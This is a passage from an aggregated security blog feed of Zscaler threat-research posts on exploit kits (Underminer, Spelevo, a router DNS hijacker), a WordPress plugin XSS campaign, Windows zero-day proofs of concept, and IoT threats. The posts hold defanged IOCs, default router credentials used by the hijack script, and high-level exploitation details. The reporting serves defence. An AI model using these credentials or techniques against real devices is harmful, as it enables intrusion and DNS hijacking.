Underminer EK is relatively new; we started seeing activity for this EK over the past six months. We see this exploit kit serving its payloads over custom HTTP ports. The recent hits for Underminer EK are shown below.

Figure 6: Underminer EK hits from 1 March 2019 to 20 May 2019.

The geographical distribution of Underminer EK hits is shown below.

Figure 7: Underminer EK heat map showing infection regions.

An infection cycle for Underminer EK is shown below.

Figure 8: Underminer EK infection cycle.

The majority of the activity that we have seen for Underminer EK starts with a malvertising campaign involving a popcash[.]net URL that redirects users to a malicious domain, adpop[.]live. The malicious domain serves content over HTTPS, which further redirects the user to the Underminer EK landing page. The call for the Underminer EK on the malicious domain adpop[.]live is shown below.

Figure 9: Underminer EK landing page call on the malvertisement page.

This landing page contains a call to the malicious SWF payload. The call can be seen in the screenshot below.

Figure 10: Underminer EK call for the Flash exploit.

The malware payload seen in this cycle was a bootkit Trojan.

Spelevo EK

We started seeing activity for a new exploit kit called Spelevo in March 2019. The Spelevo EK authors integrated the relatively new Flash exploit CVE-2018-15982. The hits for Spelevo EK activity are shown below.

Figure 11: Spelevo EK hits from 1 March 2019 to 20 May 2019.

The geographical distribution of Spelevo EK hits is shown below.

Figure 12: Spelevo EK heat map showing infection regions.

An infection cycle for Spelevo EK is shown below.

Figure 13: Spelevo EK infection cycle.

The image below shows the Spelevo EK malvertisement redirect to the EK landing page.

Figure 14: Spelevo EK malvertisement redirect.

The Spelevo EK landing page contains an obfuscated JavaScript browser plugin detection script that determines the Adobe Flash Player version the user's system is running. The obfuscated JavaScript along with the decoded script is shown in the image below.

Figure 15: Spelevo EK landing page and deobfuscated browser plugin detection JavaScript.

The same page serves a redirect URL depending on which conditions are met.

Figure 16: Spelevo EK Flash Player plugin detection.

Once the Adobe Flash version is found to be vulnerable, the user is served a malicious SWF file that exploits a use-after-free vulnerability (CVE-2018-15982) in Adobe Flash Player versions 31.0.0.153 and earlier. The cycle did not serve any malware payload on our test machine, but malware activity has been reported on successful exploitation in the wild.

Other exploit kits

We also observed some exploit kit activity directed at routers and focused on hijacking DNS queries. A snippet of scan code served by a router exploit kit is shown below.

Figure 17: Scan script served by a router exploit kit.

Based on the target IP addresses found, the script then calls another obfuscated malicious JavaScript; a sample script served by such an exploit kit can be seen below.

Figure 18: Obfuscated JavaScript on a router exploit kit landing page.

A Base64-decoded version of the landing page shows the DNS hijacking script below. In this screenshot we see the script trying to target the gateway IP with default credentials. In this case, the script is attempting to log in with the user name "admin" and an empty password. If the attempt is successful, the DNS address is modified to the attacker's DNS address (158.255.7[.]150) along with a backup legitimate public DNS address (8.8.4[.]4).

Figure 19: Base64-decoded JavaScript showing the DNS hijacking configuration.

Another instance of a default credential being used to target routers is shown below.

Figure 20: Default credentials being targeted by router exploit kits.

Here we see the password "gvt12345" being used along with the username "admin." A quick Google search for this password pattern reveals that it might have been used as a default password by a few Brazilian ISPs and has been used before in similar attacks. Checking name resolution against the attacker's DNS server shows the DNS redirect behavior in action, as shown below.

Figure 21: DNS resolution using the attacker's DNS server shows name resolution to a phishing IP.

In this case, the server IP resolved by the DNS server for www.google[.]com is a malicious server that is controlled by the attacker and used to serve phishing content to victims.

GrandSoft EK, Magnitude EK, and Fallout EK did not show changes during the quarter. We did not see activity this quarter for other recent exploit kits such as Terror EK, KaiXin EK, and Disdain EK.

Conclusion

This quarter we saw the addition of Spelevo and Underminer to the exploit kit threat landscape, and we saw some EK activity targeting routers. Exploit kits are effective because they can infect a victim's machine during web browsing without the user's knowledge. The attackers monetize successful infections in a variety of ways, such as collecting a ransom for retrieving data encrypted by ransomware, mining cryptocurrencies using the victim's system resources, or installing banking Trojans to steal a victim's identity. Attackers frequently change their techniques by obfuscating the source code or integrating new exploit code into their EKs, and security researchers analyze and block the new threats by tracking changes in EK behavior.

To help avoid infections from exploit kits, users should always block untrusted third-party scripts and resources, and avoid clicking on suspicious advertisements. Keeping web browsers and browser plugins up to date with the latest patches helps protect against the common vulnerabilities targeted by exploit kits.
The Zscaler ThreatLabZ research team has confirmed coverage for these top exploit kits and subsequent payloads, ensuring protection for organizations using the Zscaler cloud security platform.  
Categories: Security Posts

Malicious JavaScript injected into WordPress sites using the latest plugin vulnerability

Zscaler Research - 1 hour 14 mins ago
WordPress is by far the most popular content management system (CMS) and, because of its wide usage, it is also popular among cybercriminals. Most of the WordPress sites that have been compromised are the result of attackers exploiting vulnerable versions of the plugins in use.

A stored cross-site scripting (XSS) vulnerability was discovered last week in the popular WordPress Live Chat Support plugin. The vulnerability allows an unauthenticated attacker to update the plugin settings by calling an unprotected "admin_init" hook and to inject malicious JavaScript code everywhere on the site where Live Chat Support appears. All versions of this plugin prior to version 8.0.27 are vulnerable. The patch was released on May 16, 2019; version 8.0.27 and higher are fixed.

ThreatLabZ researchers recently discovered what may be the first campaign in which attackers are exploiting the Live Chat Support plugin vulnerability and injecting a malicious script responsible for malicious redirection, pushing unwanted pop-ups and fake subscriptions. While it is not yet a widespread attack, the number of compromised websites is growing (at the end of this blog there is a link to the names of the compromised sites).

Fig 1: Hits of the compromised WordPress sites

Fig 2: WordPress site using a vulnerable version of the Live Chat Support plugin

Fig 3: Obfuscated script injected into the compromised WordPress site

Fig 4: Deobfuscated version of the injected script

The injected script sends a request to the URL hxxps://blackawardago[.]com to execute the main script.

Fig 5: Request and response to hxxps://blackawardago[.]com

After the execution of the above script, the victim is redirected to multiple URLs, mainly related to pushing unwanted pop-up ads and fake error messages.

Fig 6: Highlighted (red) multiple redirected URLs after the execution of the malicious script

Fig 7: Pop-ups after execution of the malicious script

The domain that hosts the malicious script is a newly created domain hosted on a dedicated IP address.

Fig 8: Whois information of the domain

Conclusion

Cybercriminals actively look for new vulnerabilities in popular content management systems such as WordPress and Drupal, as well as in the popular plugins found on many websites. An unpatched vulnerability in either the CMS or an associated plugin provides an entry point for attackers to compromise the website by injecting malicious code, impacting the unsuspecting users who visit these sites. It is critical for website owners to apply the security update if they are using the vulnerable plugin, particularly because this is a pre-auth vulnerability and can lead to widespread compromise. The Zscaler ThreatLabZ team is actively tracking and reviewing all such malicious campaigns to ensure that our customers are protected.

IOCs
blackawardago[.]com
216[.]10[.]243[.]93

The list of compromised sites is available here.
Categories: Security Posts

Microsoft vulnerability: Source code published for three zero-day vulnerabilities in Windows

Zscaler Research - 1 hour 14 mins ago
Background

A security researcher (using the pseudonym SandboxEscaper) has discovered three zero-day vulnerabilities in Microsoft Windows. Their POC and source code have been released on GitHub. Two of these are local privilege escalation (LPE) vulnerabilities; they have been tested to work on Windows 10 only. The third vulnerability is a sandbox bypass vulnerability in Internet Explorer 11 (IE11). As of this writing, no patch has been released by Microsoft for these vulnerabilities.

What is the issue?

The security researcher has published three POCs: angrypolarbearbug2, bearlpe, and sandboxescape.

The first vulnerability, angrypolarbearbug2, can be exploited by performing specially crafted DACL (discretionary access control list) operations when the Windows Error Reporting service tries to write a DACL for the given Windows Error Reporting (.wer) file. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker.

The second vulnerability, bearlpe, targets the way the Windows Task Scheduler service uses the SetJobFileSecurityByName() function to write a DACL for the job file. For this exploit to work, one needs to have the "schtasks.exe" and "schedsvc.dll" files from Windows XP. Once successfully exploited, the vulnerability gives SYSTEM privileges to the attacker.

The third vulnerability, sandboxescape, bypasses the IE11 sandbox and allows an attacker to execute code in IE low protection mode. To exploit this vulnerability, an attacker needs to inject a special DLL into the IE process. According to reports, this exploit cannot be triggered remotely.

What systems are impacted?

The POCs have been tested on Windows 10 32-bit and 64-bit and on IE11.

Zscaler coverage

Advanced Threat Signatures:
Win32.Exploit.Bearlpe
Win32.Exploit.CVE.2019.0863
Win32.Exploit.Polarbearescape
W32/Agent.NBHI

Zscaler Cloud Sandbox provides proactive coverage against exploit payloads and advanced threats like ransomware, and the Zscaler ThreatLabZ team is actively monitoring for in-the-wild exploit attempts to ensure coverage.
Categories: Security Posts

IoT traffic in the enterprise is rising. So are the threats.

Zscaler Research - 1 hour 14 mins ago
Do you know exactly what IoT devices are on your network and how active they are? You'd better, because they might be opening the door to cybercrime.

IoT devices are, of course, nonstandard computing devices that connect wirelessly to a network and have the ability to transmit data. These devices can communicate and interact over the internet, and they can be remotely monitored and controlled. Connected devices are part of a scenario in which every device talks to other related devices in an environment to automate home and industrial tasks, and to communicate usable sensor data to users, businesses, and other interested parties. IoT devices are meant to work in concert for people at home, in industry, or in the enterprise.

Enterprises around the globe have been adopting IoT products to improve organizational efficiency, enhance communications, and gain insight into system performance. According to Gartner, 20.4 billion IoT devices will be in use worldwide by 2020, and more than 65 percent of enterprises will adopt IoT products. That translates to quite a bit of budget being dedicated to these devices. IDC has predicted that IoT spending will reach $745 billion in 2019 and surpass the $1 trillion mark in 2022. That's a 15 percent increase over 2018's $646 billion. According to the same report, the U.S. and China will be spending the most, at $194 billion and $182 billion, respectively. They are followed by Japan, Germany, Korea, France, and the UK.

Analyzing IoT transactions

To help organizations get a better understanding of IoT activity in the enterprise, the ThreatLabZ research team analyzed IoT traffic across the Zscaler cloud during a one-month period between March and April 2019. The analysis looked at the types of devices in use, the protocols they used, the locations of the servers with which they communicated, and the frequency of their inbound and outbound communications, as well as IoT traffic patterns. The report, titled IoT in the Enterprise: an analysis of traffic and threats, provides a general overview of the most frequently seen device categories, then takes a deep dive into the transaction data for specific types of IoT devices. It also explores some of the security concerns around IoT devices, including the use of plain-text channels and the threat of malware.

Emerging threats

The rapid adoption of IoT devices has opened up new attack vectors for cybercriminals. And, as is often the case, IoT technology has moved more quickly than the mechanisms available to safeguard these devices and their users. Researchers have already demonstrated remote hacks on pacemakers and cars. And, in October 2016, a large distributed denial-of-service (DDoS) attack, dubbed Mirai, affected DNS servers on the east coast of the United States, disrupting services worldwide. This attack was traced back to hackers infiltrating networks through IoT devices, including wireless routers and connected cameras.

In August 2017, the U.S. Senate introduced the IoT Cybersecurity Improvement Act, a bill addressing security issues associated with IoT devices. While it is a start, the bill only requires internet-enabled devices purchased by the federal government to meet minimum requirements, not the industry as a whole. However, it is being viewed as a starting point that, if adopted across the board, could pave the way to better IoT security industry-wide.

One of the ThreatLabZ team's discoveries was that the vast majority of IoT transactions were occurring over plain-text channels instead of the more secure SSL-encrypted channels. While a major security vulnerability, the use of unsecured channels is just one weakness of IoT devices. They are also notorious for weak, preset passwords that often go unchanged.

Malware in IoT traffic

As with just about every device connected to the internet, malware is also a threat to IoT devices. Each quarter, the Zscaler cloud blocks approximately 6,000 transactions from IoT-based malware and exploits. And, earlier this year, the Zscaler ThreatLabZ team analyzed certain threats that were targeting IoT devices. The fact is that there has been almost no security built into the IoT hardware devices that have flooded the market in recent years, and there's typically no way to easily patch these devices. While many businesses have considered security for IoT devices unnecessary because nothing is stored on the devices, this isn't the case. The Mirai botnet attack illustrated how exposed companies can be as a result of their IoT devices.

Even though these devices continue to be an easy target for cyberattacks, enterprises can take steps to reduce the risk:
- Change default credentials to something more secure. As employees bring in devices, encourage them to make sure their passwords are strong and their firmware is always up to date.
- Install IoT devices on isolated networks (to prevent lateral movement), with restrictions on inbound and outbound network traffic.
- Restrict access to IoT devices from external networks as much as possible. Block unnecessary ports from external access.
- Apply regular security and firmware updates to IoT devices, in addition to securing the network traffic.
- Finally, deploy a solution that provides visibility of the shadow IoT devices already sitting inside the network and ensure the above safeguards are applied.

Advanced security for IoT devices

IoT devices have become commonplace in enterprises across all industries and in nearly every corner of the globe. These devices were designed to help improve efficiency and expand communications, and organizations continue to explore new ways to incorporate them into everyday operations. Of course, many of the devices are employee-owned, and this is just one of the reasons they are a security concern. With all of these new connected devices, and the enormous amounts of associated data traversing your network and opening up new attack vectors for cybercriminals, can you trust your legacy network to provide adequate security? The security of your enterprise hinges on your answer.

Read the entire report, IoT in the Enterprise: an analysis of traffic and threats.

I'd like to thank our Sr. Security Researcher Viral Gandhi for his help in compiling the report.

Deepen Desai is VP of Security Research at Zscaler
Categories: Security Posts
Syndicate content